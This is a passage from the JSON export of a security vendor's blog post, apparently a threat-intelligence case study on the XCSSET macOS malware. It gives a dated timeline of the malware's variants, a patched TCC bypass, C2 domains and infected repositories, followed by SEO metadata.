class=\"flow-step\">\n      <div class=\"step-icon approx\">\ud83d\udcbb<\/div>\n      <div class=\"step-body approx\">\n        <div class=\"step-meta\">\n          <span class=\"step-date approx\">~ Early 2021<\/span>\n          <span class=\"step-tag tag-approx\">New Variant<\/span>\n        <\/div>\n        <div class=\"step-title\">Ready for Apple Silicon<\/div>\n        <div class=\"step-desc\">A variant targeting macOS 11 and Apple Silicon (M1) is documented. The operators adapt rapidly \u2014 no meaningful gap in activity. Specific month is not independently confirmed from primary sources.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 6 \u2014 VERIFIED -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon\">\ud83e\ude79<\/div>\n      <div class=\"step-body\">\n        <div class=\"step-meta\">\n          <span class=\"step-date\">May 2021<\/span>\n          <span class=\"step-tag tag-verified\">\u2713 Verified<\/span>\n        <\/div>\n        <div class=\"step-title\">CVE-2021-30713 Patched in macOS Big Sur 11.4<\/div>\n        <div class=\"step-desc\">Apple patches CVE-2021-30713 \u2014 a TCC bypass that allowed XCSSET to silently capture screenshots and screen recordings without triggering a consent dialog. The vulnerability, the CVE identifier, and the Big Sur 11.4 release date are all confirmed from Apple&#8217;s official security notes.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 7 -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon approx\">\ud83c\udfaf<\/div>\n      <div class=\"step-body approx\">\n        <div class=\"step-meta\">\n          <span class=\"step-date approx\">~ Mid-2021<\/span>\n          <span class=\"step-tag tag-approx\">Expanded Scope<\/span>\n        <\/div>\n        <div class=\"step-title\">Browser Coverage Expands<\/div>\n        <div class=\"step-desc\">Trend Micro documents confirmed additional theft targets: <strong>Chrome, Opera, Brave,<\/strong> and <strong>Yandex Browser<\/strong> \u2014 each with browser-specific cookie extraction methods.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 8 -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon approx\">\ud83d\udd04<\/div>\n      <div class=\"step-body approx\">\n        <div class=\"step-meta\">\n          <span class=\"step-date approx\">~ 2022<\/span>\n          <span class=\"step-tag tag-approx\">Campaign Wave<\/span>\n        <\/div>\n        <div class=\"step-title\">Preparing for Monterey<\/div>\n        <div class=\"step-desc\">SentinelOne documents a new campaign wave. The authors update the malware for macOS Monterey \u2014 adapting around Python&#8217;s removal from the base OS, disguising components as <code>Notes.app<\/code>, and registering new <code>.ru<\/code> C2 domains.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 9 \u2014 VERIFIED -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon major\">\ud83d\udcf0<\/div>\n      <div class=\"step-body major\">\n        <div class=\"step-meta\">\n          <span class=\"step-date major\">February 2025<\/span>\n          <span class=\"step-tag tag-major\">Return<\/span>\n          <span class=\"step-tag tag-verified\">\u2713 Verified<\/span>\n        <\/div>\n        <div class=\"step-title\">Microsoft Discloses New Variant<\/div>\n        <div class=\"step-desc\">Microsoft Security Blog publishes analysis of a significantly updated XCSSET (~February 17). Key new capabilities: updated obfuscation layers, autostart persistence via <code>~\/.zshrc<\/code>, a fake Launchpad app, and revised Xcode project injection. The Register and BleepingComputer cover the story the same week.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 10 \u2014 ADEX -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon adex\">\ud83d\udd0e<\/div>\n      <div class=\"step-body adex\">\n        <div class=\"step-meta\">\n          <span class=\"step-date adex\">December 2025<\/span>\n          <span class=\"step-tag tag-adex\">Adex Research<\/span>\n        <\/div>\n        <div class=\"step-title\">Sample Identified in the Wild<\/div>\n        <div class=\"step-desc\">Our investigation identifies a sample matching XCSSET behavior and artifacts. See Section 4.<\/div>\n      <\/div>\n    <\/div>\n\n    <!-- 11 \u2014 ADEX -->\n    <div class=\"flow-step\">\n      <div class=\"step-icon adex\">\u26a0\ufe0f<\/div>\n      <div class=\"step-body adex\">\n        <div class=\"step-meta\">\n          <span class=\"step-date adex\">April 2026<\/span>\n          <span class=\"step-tag tag-adex\">Active Now<\/span>\n        <\/div>\n        <div class=\"step-title\">No New Reports. Still Running.<\/div>\n        <div class=\"step-desc\">No new public vendor reports \u2014 but the campaign has not stopped. Our GitHub search (Section 12) finds 6 infected repositories with 2026 commits. Most recent: <code>rjkalola\/OTMS-2.0-Flutter<\/code>, committed April 20, 2026. <code>riggletoy.ru<\/code> and <code>netcdndev.in<\/code> remain live.<\/div>\n      <\/div>\n    <\/div>\n\n  <\/div>\n\n  <div class=\"note\">\n    <strong>On date reliability:<\/strong> Three dates are independently verified from primary sources: <strong>August 13, 2020<\/strong> (Trend Micro blog post), <strong>May 2021<\/strong> (Apple&#8217;s Big Sur 11.4 security notes), and <strong>February 2025<\/strong> (Microsoft Security Blog). All other pre-2025 dates are derived from secondary analyses and marked with <strong>~<\/strong>. Events from December 2025 onward reflect Adex&#8217;s own field research.\n  <\/div>\n\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>MacOS has long been considered inherently resistant to malware, but the threat landscape tells a different story. Attacks targeting the Apple ecosystem are more frequent and sophisticated than commonly assumed.&nbsp; The Adex team encountered this reality first-hand: we detected, analyzed, and attributed an active XCSSET infection \u2013 one of the most persistent and evasive malware [&hellip;]<\/p>\n","protected":false},"author":9,"featured_media":5517,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[4],"tags":[18,16,17],"class_list":["post-5507","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-current_risks","tag-fraud","tag-threat","tag-virus"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Inside the Build: How XCSSET Attacks macOS Developer Pipelines - ADEX<\/title>\n<meta name=\"description\" content=\"First-hand analysis of XCSSET \u2014 macOS malware spreading via Xcode projects. Verified timeline, live C2 infrastructure, and original findings by Adex.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Inside the Build: How XCSSET Attacks macOS Developer Pipelines - ADEX\" \/>\n<meta property=\"og:description\" content=\"First-hand analysis of XCSSET \u2014 macOS malware spreading via Xcode projects. Verified timeline, live C2 infrastructure, and original findings by Adex.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/\" \/>\n<meta property=\"og:site_name\" content=\"ADEX\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/adexsaas\/\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-29T13:55:35+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-05-01T16:04:29+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/Adex-xcsset-case-study.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1200\" \/>\n\t<meta property=\"og:image:height\" content=\"628\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Sergey Martianov\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@adexsaas\" \/>\n<meta name=\"twitter:site\" content=\"@adexsaas\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Sergey Martianov\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"22 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/case-study-xcsset-attack\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/case-study-xcsset-attack\\\/\"},\"author\":{\"name\":\"Sergey Martianov\",\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/#\\\/schema\\\/person\\\/9b104a73584bdaeab35e1d0a537f16bc\"},\"headline\":\"Inside the Build: First-Hand Analysis of XCSSET&#8217;s Attack on macOS Developer Pipelines\",\"datePublished\":\"2026-04-29T13:55:35+00:00\",\"dateModified\":\"2026-05-01T16:04:29+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/case-study-xcsset-attack\\\/\"},\"wordCount\":4735,\"publisher\":{\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/case-study-xcsset-attack\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/adex.com\\\/blog\\\/wp-content\\\/uploads\\\/2026\\\/04\\\/Adex-xcsset-case-study.png\",\"keywords\":[\"Fraud\",\"Threat\",\"Virus\"],\"articleSection\":[\"Current risks\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/case-study-xcsset-attack\\\/\",\"url\":\"https:\\\/\\\/adex.com\\\/blog\\\/case-study-xcsset-attack\\\/\",\"name\":\"Inside the Build: How XCSSET Attacks macOS Developer Pipelines - ADEX\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/case-study-xcsset-attack\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/case-study-xcsset-attack\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/adex.com\\\/blog\\\/wp-content\\\/uploads\\\/2026\\\/04\\\/Adex-xcsset-case-study.png\",\"datePublished\":\"2026-04-29T13:55:35+00:00\",\"dateModified\":\"2026-05-01T16:04:29+00:00\",\"description\":\"First-hand analysis of XCSSET \u2014 macOS malware spreading via Xcode projects. Verified timeline, live C2 infrastructure, and original findings by Adex.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/case-study-xcsset-attack\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/adex.com\\\/blog\\\/case-study-xcsset-attack\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/case-study-xcsset-attack\\\/#primaryimage\",\"url\":\"https:\\\/\\\/adex.com\\\/blog\\\/wp-content\\\/uploads\\\/2026\\\/04\\\/Adex-xcsset-case-study.png\",\"contentUrl\":\"https:\\\/\\\/adex.com\\\/blog\\\/wp-content\\\/uploads\\\/2026\\\/04\\\/Adex-xcsset-case-study.png\",\"width\":1200,\"height\":628,\"caption\":\"Adex-xcsset-case-study\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/case-study-xcsset-attack\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/adex.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Inside the Build: First-Hand Analysis of XCSSET&#8217;s Attack on macOS Developer Pipelines\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/adex.com\\\/blog\\\/\",\"name\":\"ADEX - Ad Fraud & Invalid Traffic Prevention Platform\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/#organization\"},\"alternateName\":\"ADEX\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/adex.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/#organization\",\"name\":\"ADEX - Ad Fraud & Invalid Traffic Prevention Platform\",\"url\":\"https:\\\/\\\/adex.com\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/adex.com\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/CDD2258_copy-48-1.svg\",\"contentUrl\":\"https:\\\/\\\/adex.com\\\/blog\\\/wp-content\\\/uploads\\\/2022\\\/05\\\/CDD2258_copy-48-1.svg\",\"width\":148,\"height\":30,\"caption\":\"ADEX - Ad Fraud & Invalid Traffic Prevention Platform\"},\"image\":{\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/adexsaas\\\/\",\"https:\\\/\\\/x.com\\\/adexsaas\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/adex.com\\\/blog\\\/#\\\/schema\\\/person\\\/9b104a73584bdaeab35e1d0a537f16bc\",\"name\":\"Sergey Martianov\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/63aa45589f0085b1a03dd38f54aca5d1c9362bc41d96557a14eb60152604e513?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/63aa45589f0085b1a03dd38f54aca5d1c9362bc41d96557a14eb60152604e513?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/63aa45589f0085b1a03dd38f54aca5d1c9362bc41d96557a14eb60152604e513?s=96&d=mm&r=g\",\"caption\":\"Sergey Martianov\"},\"description\":\"Chief Product Officer at Adex\",\"sameAs\":[\"http:\\\/\\\/www.adex.com\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Inside the Build: How XCSSET Attacks macOS Developer Pipelines - ADEX","description":"First-hand analysis of XCSSET \u2014 macOS malware spreading via Xcode projects. Verified timeline, live C2 infrastructure, and original findings by Adex.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/","og_locale":"en_US","og_type":"article","og_title":"Inside the Build: How XCSSET Attacks macOS Developer Pipelines - ADEX","og_description":"First-hand analysis of XCSSET \u2014 macOS malware spreading via Xcode projects. Verified timeline, live C2 infrastructure, and original findings by Adex.","og_url":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/","og_site_name":"ADEX","article_publisher":"https:\/\/www.facebook.com\/adexsaas\/","article_published_time":"2026-04-29T13:55:35+00:00","article_modified_time":"2026-05-01T16:04:29+00:00","og_image":[{"width":1200,"height":628,"url":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/Adex-xcsset-case-study.png","type":"image\/png"}],"author":"Sergey Martianov","twitter_card":"summary_large_image","twitter_creator":"@adexsaas","twitter_site":"@adexsaas","twitter_misc":{"Written by":"Sergey Martianov","Est. reading time":"22 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#article","isPartOf":{"@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/"},"author":{"name":"Sergey Martianov","@id":"https:\/\/adex.com\/blog\/#\/schema\/person\/9b104a73584bdaeab35e1d0a537f16bc"},"headline":"Inside the Build: First-Hand Analysis of XCSSET&#8217;s Attack on macOS Developer Pipelines","datePublished":"2026-04-29T13:55:35+00:00","dateModified":"2026-05-01T16:04:29+00:00","mainEntityOfPage":{"@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/"},"wordCount":4735,"publisher":{"@id":"https:\/\/adex.com\/blog\/#organization"},"image":{"@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#primaryimage"},"thumbnailUrl":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/Adex-xcsset-case-study.png","keywords":["Fraud","Threat","Virus"],"articleSection":["Current risks"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/","url":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/","name":"Inside the Build: How XCSSET Attacks macOS Developer Pipelines - ADEX","isPartOf":{"@id":"https:\/\/adex.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#primaryimage"},"image":{"@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#primaryimage"},"thumbnailUrl":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/Adex-xcsset-case-study.png","datePublished":"2026-04-29T13:55:35+00:00","dateModified":"2026-05-01T16:04:29+00:00","description":"First-hand analysis of XCSSET \u2014 macOS malware spreading via Xcode projects. Verified timeline, live C2 infrastructure, and original findings by Adex.","breadcrumb":{"@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/adex.com\/blog\/case-study-xcsset-attack\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#primaryimage","url":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/Adex-xcsset-case-study.png","contentUrl":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2026\/04\/Adex-xcsset-case-study.png","width":1200,"height":628,"caption":"Adex-xcsset-case-study"},{"@type":"BreadcrumbList","@id":"https:\/\/adex.com\/blog\/case-study-xcsset-attack\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/adex.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Inside the Build: First-Hand Analysis of XCSSET&#8217;s Attack on macOS Developer Pipelines"}]},{"@type":"WebSite","@id":"https:\/\/adex.com\/blog\/#website","url":"https:\/\/adex.com\/blog\/","name":"ADEX - Ad Fraud & Invalid Traffic Prevention Platform","description":"","publisher":{"@id":"https:\/\/adex.com\/blog\/#organization"},"alternateName":"ADEX","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/adex.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/adex.com\/blog\/#organization","name":"ADEX - Ad Fraud & Invalid Traffic Prevention Platform","url":"https:\/\/adex.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/adex.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2022\/05\/CDD2258_copy-48-1.svg","contentUrl":"https:\/\/adex.com\/blog\/wp-content\/uploads\/2022\/05\/CDD2258_copy-48-1.svg","width":148,"height":30,"caption":"ADEX - Ad Fraud & Invalid Traffic Prevention Platform"},"image":{"@id":"https:\/\/adex.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/adexsaas\/","https:\/\/x.com\/adexsaas"]},{"@type":"Person","@id":"https:\/\/adex.com\/blog\/#\/schema\/person\/9b104a73584bdaeab35e1d0a537f16bc","name":"Sergey Martianov","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/63aa45589f0085b1a03dd38f54aca5d1c9362bc41d96557a14eb60152604e513?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/63aa45589f0085b1a03dd38f54aca5d1c9362bc41d96557a14eb60152604e513?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/63aa45589f0085b1a03dd38f54aca5d1c9362bc41d96557a14eb60152604e513?s=96&d=mm&r=g","caption":"Sergey Martianov"},"description":"Chief Product Officer at Adex","sameAs":["http:\/\/www.adex.com"]}]}},"_links":{"self":[{"href":"https:\/\/adex.com\/blog\/wp-json\/wp\/v2\/posts\/5507","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/adex.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/adex.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/adex.com\/blog\/wp-json\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/adex.com\/blog\/wp-json\/wp\/v2\/comments?post=5507"}],"version-history":[{"count":53,"href":"https:\/\/adex.com\/blog\/wp-json\/wp\/v2\/posts\/5507\/revisions"}],"predecessor-version":[{"id":5578,"href":"https:\/\/adex.com\/blog\/wp-json\/wp\/v2\/posts\/5507\/revisions\/5578"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/adex.com\/blog\/wp-json\/wp\/v2\/media\/5517"}],"wp:attachment":[{"href":"https:\/\/adex.com\/blog\/wp-json\/wp\/v2\/media?parent=5507"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/adex.com\/blog\/wp-json\/wp\/v2\/categories?post=5507"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/adex.com\/blog\/wp-json\/wp\/v2\/tags?post=5507"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}